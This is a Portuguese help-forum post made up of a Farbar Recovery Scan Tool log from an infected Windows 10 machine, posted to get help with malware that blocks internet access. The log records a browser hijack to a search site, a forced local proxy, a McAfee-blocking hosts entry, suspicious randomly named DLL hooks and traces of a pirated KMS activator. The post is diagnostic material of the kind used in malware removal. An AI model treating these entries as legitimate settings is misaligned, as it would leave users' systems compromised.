[Resolvido] Vírus que não permite o PC conectar-se à internet!!

Resultado do exame da Farbar Recovery Scan Tool (FRST) (x64) Versão: 15-03-2017
Executado por Helder (administrador) em HELDER (22-03-2017 19:55:56)
Executando a partir de C:\Users\Helder\Desktop
Perfis Carregados: Helder (Perfis Disponíveis: Helder)
Platform: Windows 10 Home Single Language Versão 1607 (X64) Idioma: Português (Brasil)
Internet Explorer Versão 11 (Navegador padrão: Edge)
Modo da Inicialização: Normal
Tutorial da Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processos (Whitelisted) =================
(Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.)
(GAS Tecnologia) C:\Program Files (x86)\GbPlugin\gbpsv.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(Kyubey.exe) C:\Users\Helder\AppData\Roaming\Kyubey\Kyubey.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
(pdfforge GmbH) C:\Program Files (x86)\PDF Architect 3\creator-ws.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
(arvato digital services llc) C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
(Dell Inc.) C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(GAS Tecnologia LTDA) C:\Program Files\Diebold\Warsaw\core.exe
(Microsoft Corporation) C:\ProgramData\Windows Security\winsecurity.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Yahoo Inc.) C:\Program Files (x86)\Yahoo!\yset\{C33963AB-A3DD-9F47-914A-17CECF5B23AB}\YSearchUtilSVC.exe
(Atheros) C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\VSCore_15_6\mcapexe.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\2.3.290.0\McCSPServiceHost.exe
(Flexera Software LLC) C:\Program Files (x86)\ArcGIS\License10.2\bin\lmgrd.exe
(Flexera Software LLC) C:\Program Files (x86)\ArcGIS\License10.2\bin\lmgrd.exe
(Flexera Software LLC) C:\Program Files (x86)\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService.exe
() C:\Program Files (x86)\Legendas-3.5\srvlegendas.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DellDataVaultWiz.exe
(hxxp://www.amuleall.org/) C:\Program Files (x86)\amulell\ed2k.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler64.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek USB 2.0 Card Reader\RIconMan.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DellDataVault.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(ESRI) C:\Program Files (x86)\ArcGIS\License10.2\bin\ARCGIS.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(GAS Tecnologia) C:\Program Files (x86)\GbPlugin\gbpsv.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Microsoft Corporation) C:\Windows\System32\CastSrv.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
(GAS Tecnologia LTDA) C:\Program Files\Diebold\Warsaw\core.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.11.500\SSScheduler.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuSchd2.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\Digital Imaging\bin\HpqSRmon.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(McAfee, Inc.) C:\Program Files\McAfee\VirusScan\McVsShld.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Intel Security) C:\Program Files\Common Files\McAfee\ClientAnalytics\Legacy\McClientAnalytics.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\Core\mchost.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeHost.exe
==================== Registro (Whitelisted) ====================
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8512760 2015-11-16] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411320 2015-11-16] (Realtek Semiconductor)
HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [3759504 2012-09-12] (Dell Inc.)
HKLM\...\Run: [Diebold - Warsaw] => C:\Program Files\Diebold\Warsaw\core.exe [927280 2016-11-11] (GAS Tecnologia LTDA)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3945672 2015-08-03] (Synaptics Incorporated)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [277504 2012-07-09] (Intel Corporation)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)
HKLM-x32\...\Run: [hpqSRMon] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSRMon.exe [150016 2008-08-20] (Hewlett-Packard)
HKLM-x32\...\Run: [HDD Regenerator] => "C:\Program Files (x86)\HDD Regenerator\Shell.exe" /1
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation)
Winlogon\Notify\igfxcui: igfxdev.dll [X]
Winlogon\Notify\ GbPluginBb: C:\Program Files (x86)\GbPlugin\gbieh.dll [2016-06-16] (Banco do Brasil)
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\Run: [Facebook Update] => C:\Users\Helder\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2014-04-07] (Facebook Inc.)
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\Run: [GoogleDriveSync] => C:\Program Files (x86)\Google\Drive\googledrivesync.exe [23818360 2016-11-30] (Google)
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd)
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\Run: [Lingoes] => C:\Program Files\Lingoes\Translator2\Lingoes64.exe [3422208 2014-08-16] (Lingoes Project)
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50599552 2016-02-10] (Skype Technologies S.A.)
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\Run: [DIMBaixando a sua atualização...1464359625886] => c:\Program Files\Corel\CorelDRAW Graphics Suite X8\Draw\DIM.exe [627624 2016-03-05] (Corel Corporation)
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\Run: [DIMBaixando a sua atualização...1461778623064] => c:\Program Files\Corel\CorelDRAW Graphics Suite X8\Draw\DIM.exe [627624 2016-03-05] (Corel Corporation)
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\RunOnce: [Uninstall C:\Users\Helder\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Helder\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64"
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\MountPoints2: {e7a26988-4693-11e5-bf3a-a41f72f93456} - "E:\setup.EXE" /AUTORUN
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\scrnsave.scr [37376 2016-07-16] (Microsoft Corporation)
HKLM\...\Providers\k0chpihy: C:\Program Files (x86)\Sheneghtcumele Launcher\local64spl.dll [308224 2017-03-20] ()
IFEO\OSppSvc.exe: [Debugger] [email]KMS-R@1nHook.exe[/email]
IFEO\SppExtComObj.exe: [Debugger] C:\WINDOWS\SECOH-QAD.exe
ShellExecuteHooks: Sem Nome - {F310D49C-03A5-11E7-B093-64006A5CFC23} - C:\Users\Helder\AppData\Roaming\Chenght\Huvudomilertain.dll [145920 2017-03-20] ()
ShellExecuteHooks-x32: GbPluginObj Class - {E37CB5F0-51F5-4395-A808-5FA49E399F83} - C:\PROGRAM FILES (X86)\GbPlugin\gbieh.dll [1947872 2016-06-16] (Banco do Brasil)
ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-11-30] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-11-30] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-11-30] (Google)
ShellIconOverlayIdentifiers: [BaiduAntivirusIconLock] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CC} => -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [DBARFileBackuped] -> {831cebdd-6baf-4432-be76-9e0989c14aef} => C:\WINDOWS\system32\mscoree.dll [2016-07-16] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [DBARFileNotBackuped] -> {275e4fd7-21ef-45cf-a836-832e5d2cc1b3} => C:\WINDOWS\system32\mscoree.dll [2016-07-16] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2017-02-08]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.500\SSScheduler.exe (McAfee, Inc.)
Startup: C:\Users\Helder\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enviar para o OneNote.lnk [2016-11-21]
ShortcutTarget: Enviar para o OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation)
CHR HKLM\SOFTWARE\Policies\Google: Restrição <======= ATENÇÃO
==================== Internet (Whitelisted) ====================
(Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.)
ProxyEnable: [S-1-5-21-2306744415-2254712149-2456193828-1001] => Proxy está habilitado.
ProxyServer: [S-1-5-21-2306744415-2254712149-2456193828-1001] => http=127.0.0.1:8080;https=127.0.0.1:8080
Hosts: 0.0.0.1 mssplus.mcafee.com
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{762fc26f-dcf9-493c-ba99-f127feb34827}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{a77ced45-1a59-4730-82c6-3cbe068f3469}: [DhcpNameServer] 192.168.1.1
ManualProxies: 1http=127.0.0.1:8080;https=127.0.0.1:8080
Internet Explorer:
==================
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restrição <======= ATENÇÃO
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364&q={searchTerms}
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364&q={searchTerms}
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001 -> {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL =
SearchScopes: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001 -> {EA954D93-890B-4023-8793-DD86EE22532D} URL = hxxps://br.search.yahoo.com/search?fr=mcafee&type=C011BR826D20151119&p={searchTerms}
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-08-15] (Microsoft Corporation)
BHO: McAfee WebAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-02-22] (McAfee, Inc.)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-08-15] (Microsoft Corporation)
BHO-x32: PDF Architect 3 Helper -> {06E08260-0695-4EC1-A74B-1310D8899D93} -> C:\Program Files (x86)\PDF Architect 3\creator-ie-helper.dll [2015-09-17] (pdfforge GmbH)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2016-08-15] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\ssv.dll [2017-01-23] (Oracle Corporation)
BHO-x32: McAfee WebAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-02-22] (McAfee, Inc.)
BHO-x32: GbIehObj Class -> {C41A1C0E-EA6C-11D4-B1B8-444553540000} -> C:\PROGRAM FILES (X86)\GBPLUGIN\gbieh.dll [2016-06-16] (Banco do Brasil)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2016-08-15] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-01-23] (Oracle Corporation)
Toolbar: HKLM-x32 - PDF Architect 3 Toolbar - {2DFF3579-5AA7-45B9-9328-1D38EA230861} - C:\Program Files (x86)\PDF Architect 3\creator-ie-plugin.dll [2015-09-17] (pdfforge GmbH)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-02-22] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-02-22] (McAfee, Inc.)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-08-15] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-08-15] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-08-15] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-08-15] (Microsoft Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-02-22] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-02-22] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll [2016-12-21] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2016-12-21] (McAfee, Inc.)
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.startpageing123.com/?type=sc&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364
Edge:
======
Edge HomeButtonPage: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001 -> hxxp://www.startpageing123.com/?type=hp&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364
Edge Extension: (AdBlock) -> EdgeExtension_BetaFishAdBlock_c1wakc4j0nefm => C:\Program Files\WindowsApps\BetaFish.AdBlock_1.11.0.0_neutral__c1wakc4j0nefm [2017-02-17]
Edge Extension: (Translator For Microsoft Edge) -> MicrosoftTranslate_MicrosoftTranslatorforMicrosoftEdge_8wekyb3d8bbwe => C:\Program Files\WindowsApps\Microsoft.TranslatorforMicrosoftEdge_0.91.16.0_neutral__8wekyb3d8bbwe [2016-10-13]
FireFox:
========
FF ProfilePath: C:\Users\Helder\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\kgiv6zl5.default-1444954840928\Profiles\kgiv6zl5.default-1444954840928 [não encontrado (a)]
FF ProfilePath: C:\Users\Helder\AppData\Roaming\Mozilla\Firefox\Profiles\kgiv6zl5.default-1444954840928 [2017-03-22]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: (McAfee WebAdvisor) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2017-03-15]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Firefox\Extensions: [[email]pdf_architect_3_conv@pdfarchitect.org[/email]] - C:\Program Files (x86)\PDF Architect 3\resources\pdfarchitect3firefoxextension
FF Extension: (PDF Architect 3 Creator) - C:\Program Files (x86)\PDF Architect 3\resources\pdfarchitect3firefoxextension [2016-01-08] [não assinado]
FF HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\Firefox\Extensions: [{87F8774F-B485-47E2-A755-A40A8A5E886C}] - C:\Users\Helder\AppData\Local\GAS Tecnologia\GBBD\bb\xpi => não encontrado (a)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2015-10-15]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2017-03-14] ()
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-12-21] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2017-03-14] ()
FF Plugin-x32: @Intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @Intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-01-23] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-01-23] (Oracle Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-12-21] ()
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-08-15] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-08-15] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-12] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-20] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-20] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)
FF Plugin-x32: PDF Architect 3 -> C:\Program Files (x86)\PDF Architect 3\np-previewer.dll [2015-09-17] (pdfforge GmbH)
